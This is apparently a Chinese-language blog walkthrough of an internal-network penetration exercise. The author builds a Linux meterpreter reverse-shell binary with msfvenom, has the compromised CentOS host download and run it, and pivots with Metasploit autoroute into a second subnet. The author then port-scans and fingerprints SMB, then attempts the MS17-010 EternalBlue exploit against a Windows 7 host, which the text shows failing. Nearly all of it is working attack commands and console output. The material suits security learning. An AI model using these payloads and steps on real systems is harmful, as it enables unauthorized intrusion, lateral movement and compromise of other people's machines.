内网渗透之内网渗透
内网渗透之内网渗透
emm,主要前篇一下写跑题所以强行中断下,继续k的渗透之路。
1、横向提权
此时已经拿到了CentOS的最高权限,可以查看数据等信息。但是这样还不够,在信息的过程中还发现了一台新的主机,不过它不在192.168.12.0/24这个网段,而是处于192.168.159.0/24这个网段的。如果想进行攻击的,此中会出现一点小麻烦,所以要想其他的办法了,这里采用的方式为 跳板机制。
扫盲行动:
网络跳板,简单来说,就是为了隐藏自己的地址,让别人无法查找到自己的位置。通过跳板的使用,可以减少他人查找到你的可能性,同时也增加了被发现的难度。
举个简单例子,你在A朋友家玩儿,发现了通往B朋友家的后门,然后你来到了B朋友家,又发现了C朋友家的厨房是和B朋友家相连的,你就顺便来到了C朋友的家,
同时C朋友家的厕所又是和D朋友家相连。你在A朋友家做了一些事情,比如设置和修改。A朋友回家了,他会发现有人进了自己的家,但是他顺着路线可以找到B朋友
家,通过长期的寻找,终于找到了C朋友家,但他遇见难题了,他并不知道是B朋友家的人动了自己的东西,还是D朋友家的人动了自己的东西。这时,你就是安全的
了。这中间的各种朋友关系,其实就是你的跳板。通过这种跳板的转换,我们可以改变自己上网的IP位置,隐藏自己的真实物理位置。
好了,前奏就到这里,开始搞事。
1-1、制作一个后门软件
新建一个窗口,开启web服务(方便文件传输)
root@mtcx:~# systemctl restart apache2
使用命令生成一个木马
root@mtcx:~# msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.12.53 LPORT=4444 -b "\x00" -f elf -o /var/www/html/mtcx
命令解释
--platform 指定linux
-f 指定elf 即linux操作系统的可执行文件类型
-b 去掉坏字符
查看一下
1-2、目标机下载文件
[root@localhost ~]# wget http://192.168.12.53/mtcx
1-3、开启监听
配置参数
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.12.53
LHOST => 192.168.12.53
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
开始监听
msf5 exploit(multi/handler) > exploit
1-4、目标后门软件
软件提权
[root@localhost ~]# chmod 777 mtcx
运行
[root@localhost ~]# ./mtcx
1-5、获取到权限执行命令
msf5 exploit(multi/handler) > exploit
meterpreter > getuid
2、MSF跳板功能
获取目标内网相关信息
meterpreter > run get_local_subnets
–>添加去往目标网段的转发路由
meterpreter > run autoroute -s 192.168.159.0/24
–>查看路由添加情况
meterpreter > run autoroute -p
将去往内网的路由打通后,接下来就可以使用MSF平台直接对内网主机扫描和进行各种高危漏洞的直接渗透利用了。
保存session到后
meterpreter > background
查看下sesions
使用端口转发模块验证目标开启了80端口
msf5 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > show options
设置下目标IP
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.159.133
RHOSTS => 192.168.159.133
设置目标端口
msf5 auxiliary(scanner/portscan/tcp) > set ports 80
ports => 80
运行一下,可以访问
通过这种方式我们可以测试下内网中存在smb漏洞
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.159.0/24
RHOSTS => 192.168.159.0/24
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 445
PORTS => 445
msf5 auxiliary(scanner/portscan/tcp) > run
通过测试发现内网中存在一台.131的主机开放了445端口。
3、主机探测
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > show options
设置下目标主机IP,扫描一下
msf5 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131
msf5 auxiliary(scanner/smb/smb_version) > run
通过扫描发现目标系统为win7系统 sp1的,这就很nice呀刚好有win7对应的smb漏洞
msf5 auxiliary(scanner/smb/smb_version) > search name:smb platform:windows
这里先使用ms17_010这个模块,测试下是否存在这个这个漏洞。
msf5 auxiliary(scanner/smb/smb_version) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
设置目标IP地址
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
可以看到目标是存在ms17-010这个漏洞
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
设置下目标IP地址
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.159.131
RHOSTS => 192.168.159.131
设置payload
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
设置监听IP,端口
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.12.53
LHOST => 192.168.12.53
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 6666
LPORT => 6666
开始攻击
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
在这里发现通过多次尝试,发现虽然漏洞是可以利用的但是却无法建立连接
在经过一番询问度娘后发现这是因为payload的原因,这里更换payload,重新开始
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
应为之前payload改变过端口,所以被继承下来,直接开始run
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
欸,还是没有获取到连接,难受 ≧ ﹏ ≦